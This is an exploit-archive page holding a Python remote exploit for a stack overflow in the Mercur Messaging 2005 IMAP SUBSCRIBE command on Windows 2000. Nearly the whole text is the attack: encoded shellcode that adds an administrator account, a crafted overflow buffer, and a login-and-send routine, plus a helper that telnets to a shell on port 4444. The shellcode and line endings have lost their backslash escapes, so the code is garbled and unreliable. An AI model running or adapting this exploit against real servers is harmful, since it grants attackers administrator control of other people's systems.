Mercur Messaging 2005 IMAP (SUBSCRIBE) Remote Exploit (win2k SP4)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Mercur Messaging 2005 IMAP (SUBSCRIBE) Remote Exploit (win2k SP4)
# Published : 2007-03-21
# Author : Winny Thomas
# Previous Title : Helix Server 11.0.1 Remote Heap Overflow Exploit (win2k SP4)
# Next Title : Mercur Messaging 2005 <= SP4 IMAP Remote Exploit (egghunter mod)

#!/usr/bin/python
# Remote exploit for the stack overflow vulnerability in Mercur Messaging 2005
# SP3 IMAP service. The exploit was tested on windows 2000 server SP4 in a
# Vmware environment. At the time of overflow EBX points to our shellcode.
# However this buffer into which EBX points will give a maximum of 224 bytes of
# uninterrupted space for shellcode. So for my analysis is settled for a useradd
# shellcode which comes to 224 bytes :-). However looking at it a little bit
# further i found that you can send SUBSCRIBE request just before the actual
# command that causes the overflow and you have a shellcode space of 520 bytes
# further down the stack. So you can club the 224 bytes you get at overflow time
# with this 520 and use a two stage shellcode. Too tired for that stunt so
# wrote this exploit which add user x with password x to the admin group. Too
# tired that i did not even clean up the code from the junk i used. You need to
# have a valid IMAP account for this exploit to work.
#
# Author shall bear no reponsibility for any screw ups caused by using this code
# Winny Thomas :-)
#
import os
import sys
import time
import socket
import struct

shellcode = "x33xc9x83xe9xcexd9xeexd9x74x24xf4x5bx81x73x13xa4"
shellcode += "xa1x39xecx83xebxfcxe2xf4x58x49x7dxecxa4xa1xb2xa9"
shellcode += "x98x2ax45xe9xdcxa0xd6x67xebxb9xb2xb3x84xa0xd2xa5"
shellcode += "x2fx95xb2xedx4ax90xf9x75x08x25xf9x98xa3x60xf3xe1"
shellcode += "xa5x63xd2x18x9fxf5x1dxe8xd1x44xb2xb3x80xa0xd2x8a"
shellcode += "x2fxadx72x67xfbxbdx38x07x2fxbdxb2xedx4fx28x65xc8"
shellcode += "xa0x62x08x2cxc0x2ax79xdcx21x61x41xe0x2fxe1x35x67"
shellcode += "xd4xbdx94x67xccxa9xd2xe5x2fx21x89xecxa4xa1xb2x84"
shellcode += "x98xfex08x1axc4xf7xb0x14x27x61x42xbcxccx51xb3xe8"
shellcode += "xfbxc9xa1x12x2exafx6ex13x43xc2x54x88x8axc4x41x89"
shellcode += "x84x8ex5axccxcaxc4x4dxccxd1xd2x5cx9ex84xd9x19x94"
shellcode += "x84x8ex78xa8xe0x81x1fxcax84xcfx5cx98x84xcdx56x8f"
shellcode += "xc5xcdx5ex9excbxd4x49xccxe5xc5x54x85xcaxc8x4ax98"
shellcode += "xd6xc0x4dx83xd6xd2x19x94x84x8ex78xa8xe0xa1x39xec"

def ExploitMercur(target, username, passwd):
       sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
       sock.connect((target, 143))
       response = sock.recv(1024)
       print response

       login = 'a001 LOGIN ' + username + ' ' + passwd + 'rn'
       sock.send(login)
       response = sock.recv(1024)
       print response

       payload = shellcode
       payload += 'L' * 3
       payload += struct.pack('<L', 0x7C577B03)
       payload += 'Y' * 4
       payload += 'Z' * 4
       payload += 'L' *  25
       payload += 'M' *  16

       payload += ' ' + '"/"' + ' ' + '""'
       req = 'a001 SUBSCRIBE ' + payload + 'rn'
       sock.send(req)
       sock.close()
       print 'User x added with passwd x to administrator group'

def ConnectRemoteShell(target):
       connect = "/usr/bin/telnet " + target + " 4444"
       os.system(connect)

if __name__=="__main__":
       try:
               target = sys.argv[1]
               username = sys.argv[2]
               passwd = sys.argv[3]
       except IndexError:
               print 'Usage: %s <imap server> <username> <password>n' % sys.argv[0]
               sys.exit(-1)

       ExploitMercur(target, username, passwd)

# www.Syue.com [2007-03-21]